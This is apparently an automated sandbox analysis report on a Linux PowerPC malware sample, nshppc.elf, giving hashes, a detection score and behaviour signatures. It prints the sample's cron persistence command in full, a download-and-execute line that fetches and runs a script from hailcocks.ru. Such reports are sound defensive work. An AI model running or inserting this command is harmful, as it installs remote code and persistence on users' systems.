Linux Analysis Report
nshppc.elf

Overview

General Information

Sample name: nshppc.elf
Analysis ID: 1542849
MD5: 29a8d657f77fbbb6816b15a223770f27
SHA1: c13aee7d2d3856e6a12dff9e14e9cd1803623ca3
SHA256: d499423beedb16572846748e277aa66856b41f66a5ecaa08cfd1d00754a25f91
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads system version information
Sample has stripped symbol table
Sample listens on a socket
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: nshppc.elf ReversingLabs: Detection: 21%
Source: tmp.5oUS4H.18.dr String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: /tmp/nshppc.elf (PID: 5711) Socket: 127.0.0.1:1172 Jump to behavior
Source: tmp.5oUS4H.18.dr String found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal56.troj.linELF@0/1@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5721) Crontab executable: /usr/bin/crontab -> crontab -l Jump to behavior
Source: /bin/sh (PID: 5720) Crontab executable: /usr/bin/crontab -> crontab - Jump to behavior
Source: /usr/bin/crontab (PID: 5720) File: /var/spool/cron/crontabs/tmp.5oUS4H Jump to behavior
Source: /usr/bin/crontab (PID: 5720) File: /var/spool/cron/crontabs/root Jump to behavior
Source: /tmp/nshppc.elf (PID: 5713) Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" Jump to behavior
Source: /usr/lib/snapd/snap-failure (PID: 5855) Systemctl executable: /usr/bin/systemctl -> systemctl stop snapd.socket Jump to behavior
Source: /usr/lib/snapd/snap-failure (PID: 5839) Reads version info: /proc/version Jump to behavior
Source: submitted sample Stderr: no crontab for root: exit code = 0
Source: /tmp/nshppc.elf (PID: 5885) Sleeps longer then 60s: 60.0s Jump to behavior
Source: /tmp/nshppc.elf (PID: 5711) Queries kernel information via 'uname': Jump to behavior
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmp Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: nshppc.elf, 5711.1.0000558c82996000.0000558c82a6b000.rw-.sdmp, nshppc.elf, 5722.1.0000558c82996000.0000558c82a6b000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmp Binary or memory string: /usr/bin/qemu-ppc
Source: nshppc.elf, 5711.1.00007ffda4401000.00007ffda4422000.rw-.sdmp, nshppc.elf, 5722.1.00007ffda4401000.00007ffda4422000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/nshppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshppc.elf
No contacted IP infos